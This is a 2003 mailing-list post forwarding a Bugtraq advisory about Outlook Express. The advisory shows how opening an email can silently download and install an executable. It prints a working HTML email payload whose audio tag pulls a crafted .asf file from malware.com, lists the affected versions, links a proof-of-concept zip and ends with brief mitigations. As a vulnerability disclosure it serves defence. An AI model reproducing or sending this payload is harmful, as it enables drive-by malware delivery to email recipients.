[vox] OT: [Fwd: Restricted Zone: the OUTLOOK EXPRESS]
ME
vox@lists.lugod.org
Wed, 21 May 2003 10:38:43 -0700 (PDT)
Yet another reason to avoid MS products like "Look Out!" Express.
---------------------------- Original Message ----------------------------
Subject: Restricted Zone: the OUTLOOK EXPRESS
From: "http-equiv@excite.com" <1@malware.com>
Date: Wed, May 21, 2003 4:55
To: bugtraq@securityfocus.com
NTBugtraq@listserv.ntbugtraq.com
--------------------------------------------------------------------------
Tuesday, 20 May, 2003
Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup post.
This can be achieved with the default setting of Outlook Express:
RESTRICTED ZONE.
Technically the following never worked, cannot work, shouldn't work. But
it does:
MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03 http://www..malware.com
<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://www.malware.com/freek.asf" />
</body></html>
What that does is invoke our freakish media file including our trusty and
battle-hardened 0s URL flip from within the html of an email or newsgroup
post on viewing, which ordinarily could never be done.
But it now appears that while custom-crafted media files fail,
modified third-party files [whatever that means] function according to
plan. Specifically audio + *.asf. Our 0s URL flip points to our file on
the remote server and automatically forces our download as instructed.
Couple that with the most recent flood-like functionality of the iframe:
http://www.securityfocus.com/archive/1/321662 and
that's the end of that.
Tested on:
Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]
First Step Working Example:
http://www.malware.com/but.its.free.zip
Notes:
1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
WebBrowser Control Embedded Media Player File Vulnerability ':
http://www.securityfocus.com/bid/4343 which appears to never have been
patched.
2. disable scripting in the media player [if it helps]
3. do not be lured into opening email and newsgroup posts from
untrustworthy sources
End Call
--
http://www.malware.com